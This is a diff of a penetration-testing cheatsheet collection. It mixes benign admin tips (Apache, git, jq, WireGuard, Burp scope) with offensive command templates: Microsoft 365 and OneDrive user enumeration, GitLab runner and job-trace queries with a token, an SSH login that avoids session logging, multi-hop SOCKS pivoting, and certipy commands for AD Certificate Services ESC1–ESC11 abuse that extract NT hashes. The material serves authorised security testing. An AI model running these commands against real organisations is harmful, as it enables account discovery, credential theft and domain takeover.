More cheatsheets

linux/TeamsEnum.md

@@ -0,0 +1,13 @@
+### Source
+https://github.com/sse-secure-systems/TeamsEnum
+
+### Enumerate email addresses (use tenant.onmicrosoft.com for internal user syntax)
+```	
+TeamsEnum -a password -u <user> -p "<password>" -f <userFile> -o <outfile>.json
+```
+
+### Print existing accounts
+```
+jq -r 'select(.exists == true) | .email' <file>.json
+```
+

linux/apache2.md

@@ -57,6 +57,15 @@ a2enmod headers
 sed -i '$ a\Header always append X-Frame-Options DENY' /etc/apache2/apache2.conf
 ```
 
+### Disable directory listing
+```
+<Directory /var/www/>
+        Options FollowSymLinks
+        AllowOverride None
+        Require all granted
+</Directory>
+```
+
 ### Remove apache version
 ```
 vim /etc/apache2/apache2.conf

linux/burp.md

@@ -4,31 +4,33 @@ https://www.jython.org/download
 Extensions > Extensions settings > Python Environment > Location of standalone file
 ```
 
-### Custom Collaborator Server
+### Start burp from command line without extensions
 ```
-Project Options > Misc > Burp Collaborator Server > Use a privat Collaborator Server > Server location: <serverLocation>
-User Options > Misc > Perfomance Feedback > Uncheck Submit Box
+java -jar <path/to/burp.jar> --disable-extensions
 ```
 
-### Silence traffic (firefox)
+### Custom Collaborator Server
 ```
-Proxy > Proxy settings > Tools > Proxy > Request interception rules
-And, Domain name, Does not match
--> mozilla.com
-
-Proxy > Proxy settings > Project > Scope > Target Scope
-Exclude from scope > Add
--> mozilla.com
+Settings > Project > Collaborator > Use a privat Collaborator Server > Server location: <serverLocation>
 ```
 
-### Export custom configuration 
+### Send traffic over proxy
 ```
-Burp > User settings > Save user settings 
+Settings > Network > Connections > SOCKS proxy
+Enable "Use SOCKS proxy"
+SOCKS proxy host: 127.0.0.1
+SOCKS proxy port: 9050
 ```
 
-### Start burp from command line without extensions
+### Restrict traffic to scope
 ```
-java -jar <path/to/burp.jar> --disable-extensions
+Settings > Project > Scopt
+Enable "Use advanced scope control"
+
+Add > .*\.domain\.com
+
+Out-of-scope request handling:
+Enable: "Drop all out-of-scope requests"
 ```
 
 ### Intruder Payload types
@@ -39,8 +41,3 @@ Pitchfork - Hits each parameter at the same time with one item from its associat
 Cluster Bomb - Combination of all payloads vs. parameters 
 ```
 
-### Use burp with proxychains
-```
-User options > SOCKS Proxy > SOCKS proxy host: 127.0.0.1 > SOCKS proxy port 9050
-```
-

linux/firefox.md

@@ -0,0 +1,19 @@
+### Silence Firefox traffic
+```
+about:preferences
+Home > Homepage and new windows > Blank Page
+Home > New tabs > Blank Page
+Search > Disable "Provide search suggestions"
+Privacy & Security > Enhanced Tracking Protection > Custom (Disable all trackers)
+
+about:config
+network.captive-portal-service.enabled - false
+
+extensions.blocklist.enabled - false
+network.prefetch-next - false
+extensions.getAddons.cache.enabled - false
+dom.push.enabled - false
+network.dns.disablePrefetch - true
+Network.http.speculative-parallel-limit - 0
+```
+

linux/git.md

@@ -24,16 +24,6 @@ git fetch --tags
 git log <tagName>
 ```
 
-### Switch to specific version
-```
-git checkout <tagName>
-```
-
-### Switch to newest commit (new repos use main)
-```
-git checkout master
-```
-
 ### Get project url
 ```
 git remote get-url origin
@@ -44,6 +34,11 @@ git remote get-url origin
 git remote set-url origin <user>@<rhost>:<path>.git
 ```
 
+### Remove branch from repository
+```
+git push origin -d <branch>
+```
+
 ### Set custom timestamp
 ```
 git commit --date="Wed Feb 13 15:00 2019 +0100" -m "<message>"
@@ -80,12 +75,24 @@ git push origin master
 git clone ssh://<user>@<rhost>/<path>.git
 ```
 
+### List available runner
+```
+curl -s --header "PRIVATE-TOKEN: <token>" "https://<gitlabRhost>/api/v4/runners"
+curl -s --header "PRIVATE-TOKEN: <token>" "https://<gitlabRhost>/api/v4/runners/<id>/jobs"
+curl -s --header "PRIVATE-TOKEN: <token>" "https://<gitlabRhost>/api/v4/runners/<id>/jobs/<jobNumber>/trace"
+```
+
 ### Proxy settings
 ```
 git config --global http.proxy http://<rhost>:<port>
 git config --global --unset http.proxy
 ```
 
+### Download using oauth token
+```
+https://oauth2:<token>@<gitlabHost>/<userOrOrg>/<repository>
+```
+
 ### Generate access token
 * https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token
 

linux/hashcat.md

@@ -80,3 +80,8 @@ hashcat -a 0 -o <resultFile> -m 1000 <hashFile> <wordlist> --potfile-path <potFi
 hashcat -m <hashId> <resultFile> --show
 ```
 
+### List hash formats
+```
+hashcat --hash-info
+```
+

linux/jq.md

@@ -1,6 +1,16 @@
 ### Source
 https://github.com/stedolan/jq
 
+### Print in csv format and replace char ;
+```
+cat <file>.json | jq -r '"\(.key1) ; \(.key | gsub(";"; "_"))"'
+```
+
+### Print key1 if key1 exists, else key2
+```
+cat <file>.json | jq -r 'if has("key1") then .key1 else .key2 end'
+```
+
 ### Print distinguishedname of bloodhound users
 ```
 cat <userFile>.json | jq '.data[].Properties.distinguishedname

linux/ntlmrecon.md

@@ -3,6 +3,6 @@ https://github.com/pwnfoo/NTLMRecon
 
 ### Search for web paths that uses NTLM authentication and extract internal domain
 ```
-ntlmrecon --input <url>
+ntlmrecon --input <url> --outfile <file>
 ```
 

linux/onedrive_enum.md

@@ -0,0 +1,8 @@
+### Source
+https://github.com/nyxgeek/onedrive_user_enum
+
+### Verify e-mail addresses via OneDrive
+```
+python3 onedrive_enum.py -d <domain> -U <userFile> -v
+```
+

linux/roadrecon.md

@@ -27,3 +27,8 @@ roadrecon plugin xlsexport -v -d <file>.db
 libreoffice --headless --convert-to csv <file>.xls --outdir <outdir>
 ```
 
+### Export usernames
+```
+sqlite3 <file>.db "select UserPrincipalName from Users;" 
+```
+

linux/screen.md

@@ -5,7 +5,7 @@ screen -S <name>
 
 ### Log session to file
 ```
-screen -S <name> -L -Logfile <file>
+screen -S <name> -L -Logfile $(date +"%Y-%m-%d_%T")
 ```
 
 ### Detach

linux/ssh-keygen.md

@@ -0,0 +1,5 @@
+### Generate public key for given private key
+```
+ssh-keygen -y -f <file>.private > <file>.pub
+```
+

linux/ssh.md

@@ -8,23 +8,18 @@ ssh-keygen -t rsa -b 4096
 ssh-copy-id -i ~/.ssh/<privateKey> <user>@<rhost>
 ```
 
-### If error occurs try:
+### Correct permissione for ssh files
 ```
 chmod 700 ~/.ssh
 chmod 600 ~/.ssh/authorized_keys
 ```
 
-### Download public ssh key
-```
-ssh-keyscan -t rsa <rhost> -p <rport>
-```
-
 ### Change password of private ssh key
 ```
 ssh-keygen -p -f <privateKey>
 ```
 
-### Only allow key-based authentication in /etc/ssh/sshd_config
+### Harden ssh config (/etc/ssh/sshd_config)
 ```
 PubkeyAuthentication yes
 PasswordAuthentication no
@@ -74,3 +69,9 @@ proxychains <command>
 # will not be added to /var/log/utmp, sessions will not appear using w, no usage of .bash_profile .profile
 ssh -o UserKnownHostsFile=/dev/null -T <user>@<rhost> 'bash -i'
 ```
+
+### Port forward over multiple hosts
+```
+ssh -D 9050 -J <user>@<rhost>:<port>,<user>@<rhost>:<port> <user>@<rhost> -p <port>
+```
+

linux/wg.md

@@ -16,3 +16,9 @@ wg genkey | sudo tee /etc/wireguard/private.key
 cat /etc/wireguard/private.key | wg pubkey | sudo tee /etc/wireguard/public.key
 ```
 
+### Restart server
+```
+wg-quick down wg0
+systemctl restart [email protected]
+```
+

theorie/active-directory-methodology.md → theorie/active-directory.md

@@ -767,9 +767,9 @@ PS> $dsEntry.PsBase.CommitChanges()
 
 The further course results depending on which object is contained in the OU - see GenericAll.
 
-## Enroll (Certipy)
+# Active Directory Certificate Services
 
-### ESC1
+## ESC1
 
 ESC1 allows Client Authentication and permits the enrollee to supply an arbitrary Subject Alternative Name (SAN) to a certficate.
 
@@ -783,11 +783,11 @@ Using the certificate the NT hash can be extracted:
 $> certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <domainController>
 ```
 
-### ESC2
+## ESC2
 
 ESC2 is when a certificate template can be used for any purpose (change Enrollment Agents - see ESC3)
 
-### ESC3
+## ESC3
 
 ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent).
 This EKU can be used to request certificates on behalf of other users. 
@@ -804,7 +804,7 @@ Use this certificate with -on-behalf-of parameter (must be in the form of domain
 $> certipy req '<domain>/<user>:<password>'@<certificateAuthorityRhost> -ca '<certificateAuthority>' -template 'User' -on-behalf-of '<domain>\<user>' -pfx '<file>.pfx'
 ```
 
-### ESC4
+## ESC4
 
 ESC4 is when a user has write privileges over a certificate template.
 Overwrite the template and make it vulnerable to ESC1:
@@ -826,16 +826,16 @@ Restore the configuration afterwards:
 $> certipy template '<domain>/<user>'@<certificatesRhost> -hashes :<ntHash> -template 'ESC4' -configuration '<file>.json'
 ```
 
-### ESC5
+## ESC5
 
 Write Access on PKI Object.
 
-### ESC6
+## ESC6
 
 ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.
 In essence, this flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration (see ESC1).
 
-### ESC7 (Manage CA & Manage Certificates)
+## ESC7 (Manage CA & Manage Certificates)
 
 In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled.
 Add Manage Certificates access right:
@@ -876,7 +876,7 @@ Extract NT hash:
 $> certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <domainController>
 ```
 
-### ESC8
+## ESC8
 
 An Enrollment Service has installed and enabled HTTP Web Enrollment.
 Start relay server:
@@ -897,19 +897,19 @@ Get NT hash of domain controller:
 $> certipy auth -pfx '<file>.pfx' -username '<user>' -domain '<domain>' -dc-ip <domainController>
 ```
 
-### ESC9
+## ESC9
 
 GenericWrite on user or computer and vulnerable certficate template:
 
 1. change username
 2. request certificate
 3. change username.
 
-### ESC10
+## ESC10
 
 Same as ESC9 but any certificate template can be used.
 
-### ESC11
+## ESC11
 
 RPC Enrollment relay attack: